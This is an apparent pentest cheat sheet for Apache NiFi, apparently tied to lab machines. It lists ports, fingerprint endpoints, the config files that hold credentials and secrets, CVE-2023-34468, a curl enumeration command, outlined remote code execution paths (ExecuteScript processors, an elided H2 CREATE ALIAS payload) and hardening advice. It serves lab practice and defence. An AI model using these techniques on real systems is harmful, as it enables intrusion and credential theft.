Apache NiFi
aka NiFi
Java dataflow platform with a web UI on 8080/8443. Processors like ExecuteScript and an H2 JDBC connection give straightforward code execution, sometimes unauthenticated on older builds.
Ports
| Port | Proto | Notes |
|---|---|---|
8080 | tcp | NiFi web UI (HTTP) |
8443 | tcp | NiFi web UI (HTTPS) |
Fingerprint
- NiFi canvas UI at /nifi
- Version in the UI footer or /nifi-api/system-diagnostics
Key files
| Path | Holds | Sensitive |
|---|---|---|
conf/nifi.properties | ports, security and sensitive-props key | sensitive |
conf/login-identity-providers.xml | single-user login credentials | sensitive |
conf/flow.xml.gz | the flow definition, can contain stored secrets | sensitive |
Default / weak creds
single-user creds generated at first start (older builds shipped open)
Service users
nifi
Known CVEs
| CVE | Impact |
|---|---|
| CVE-2023-34468 | RCE via the DBCPConnectionPool H2 JDBC URL |
Exploitation primitives
- ExecuteScript / ExecuteProcess processors run attacker code as the nifi user
- ExecuteSQL against an H2 database with a Java alias (CREATE ALIAS ... AS) executes shell commands
- Stored credentials in flow.xml.gz and parameter contexts
Overview
NiFi builds data pipelines from processors on a web canvas. Several processors are effectively code-execution by design, so admin (or open) access to the UI is usually a shell as the nifi user.
Enumeration
Read the version once authenticated:
curl -sk https://<TARGET>:8443/nifi-api/system-diagnosticsRCE paths
- Add an
ExecuteProcess/ExecuteScriptprocessor that runs your command. - Or abuse an H2
ExecuteSQLflow:CREATE ALIAS x AS $$ ... Runtime.exec ... $$;.
Hardening
Enforce authentication and least-privilege policies, patch the H2 JDBC CVE, and restrict who can add or modify processors.
Seen on these machines 1
